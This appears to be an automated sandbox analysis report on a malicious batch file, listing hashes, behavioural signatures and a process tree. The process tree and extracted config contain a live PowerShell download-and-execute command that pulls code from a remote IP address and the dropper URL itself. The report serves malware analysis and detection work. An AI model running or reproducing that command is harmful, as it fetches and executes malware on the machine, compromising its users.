Analysis
  max time kernel: 62s
  max time network: 63s
  platform: windows7_x64
  resource: win7
  submitted: 02-08-2020 19:10
Static task: static1

Behavioral task: behavioral1
  Sample: 21b6d26f5616dbe4b9f07bd5660bb62d.bat
  Resource: win7 (windows7_x64)
  0 signatures, 0 seconds

Behavioral task: behavioral2
  Sample: 21b6d26f5616dbe4b9f07bd5660bb62d.bat
  Resource: win10v200722 (windows10_x64)
  0 signatures, 0 seconds
General
  Target: 21b6d26f5616dbe4b9f07bd5660bb62d.bat
  Size: 215B
  MD5: d0dba6d8db0dbf8637507b05349fd02f
  SHA1: e3795cff8728780bd8d72ae5f7e317ee93075e93
  SHA256: 085cf732d404c2443d63dd7fef9f872f0c4dc0ef5f0c048bd308a20aff169bd8
  SHA512: de33e169bfaf0170acb3053f62d40e115e162671c77555e7c0bae5e12579f7900f1172296279167f120a3821566ee8b111e5e2e366711bf0d5fde9e5e3340b7f
  Score: 10/10
Malware Config (Extracted)
  Language: ps1
  Source: URLs
  ps1.dropper: http://185.103.242.78/pastes/21b6d26f5616dbe4b9f07bd5660bb62d
Signatures

Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes (description / pid / process):
    Token: SeDebugPrivilege / 852 / powershell.exe

Suspicious behavior: EnumeratesProcesses (2 IoCs)
  Processes (pid / process):
    852 / powershell.exe
    852 / powershell.exe

Blacklisted process makes network request (1 IoC)
  Processes (flow / pid / process):
    3 / 852 / powershell.exe

Suspicious use of WriteProcessMemory (4 IoCs)
  Processes (description / pid / process / target process), 4 identical entries:
    PID 1088 wrote to memory of 852 / 1088 / cmd.exe / powershell.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
  Processes (pid / process):
    852 / powershell.exe
Processes

1. C:\Windows\system32\cmd.exe (PID: 1088)
   Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\21b6d26f5616dbe4b9f07bd5660bb62d.bat"
   Signatures:
     - Suspicious use of WriteProcessMemory

   2. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID: 852, child of 1088)
      Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/21b6d26f5616dbe4b9f07bd5660bb62d');Invoke-NWPLCMRG;Start-Sleep -s 10000"
      Signatures:
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious behavior: EnumeratesProcesses
        - Blacklisted process makes network request
        - Suspicious behavior: CmdExeWriteProcessMemorySpam